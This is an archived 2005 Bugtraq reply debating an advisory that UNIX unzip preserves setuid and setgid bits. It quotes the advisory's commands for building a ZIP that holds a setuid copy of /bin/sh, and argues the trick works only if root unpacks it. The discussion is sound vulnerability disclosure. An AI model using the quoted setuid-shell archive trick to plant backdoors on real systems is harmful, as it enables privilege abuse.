lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <E8ABF975-89D6-11D9-A0B6-000D93CA97AA@jms1.net>
Date: Mon, 28 Feb 2005 17:20:10 -0500
From: John Simpson <jms1@...1.net>
To: bugtraq@...urityfocus.com
Subject: Re: 7a69Adv#22 - UNIX unzip keep setuid and setgid files

On 28 Feb 2005, at 08:17, Albert Puigsech Galicia wrote:
>
> III. Exploit
>
> It's realy easy to test this vulnerability. You can create a malicious 
> ZIP
> file following this example:
>
>  $ cp /bin/sh .
>  $ chmod 4777 sh
>  $ zip malicious.zip sh
>
>
> When another user (including root) unpacks the file, a setuid shell 
> file will
> be created without any warning, as you can see here:
>
>  # id
>  # unzip malicious.zip
>  Archive:  malicious.zip
>   inflating: sh
>  # ls -l sh
>  -rwsrwxrwx  1 root root 705148 Jan 16 17:04 sh

this only works if the user un-zipping the file is already root. 
otherwise it creates an "sh" binary which is setuid to the user who 
unzipped the file. this kind of "exploit" is only useful if you can 
somehow trick root into unzipping the file- it cannot be used to gain 
root on a machine where you don't already have it.

although i will agree that having the unzip program warn the user when 
creating a setuid or setgid file is a good idea in general.

--------------------------------------------------
| John M. Simpson - KG4ZOW - Programmer At Large |
| http://www.jms1.net/           <jms1@...1.net> |
--------------------------------------------------
| Mac OS X proves that it's easier to make UNIX  |
| pretty than it is to make Windows secure.      |
--------------------------------------------------

Download attachment "PGP.sig" of type "application/pgp-signature" (187 bytes)

Powered by blists - more mailing lists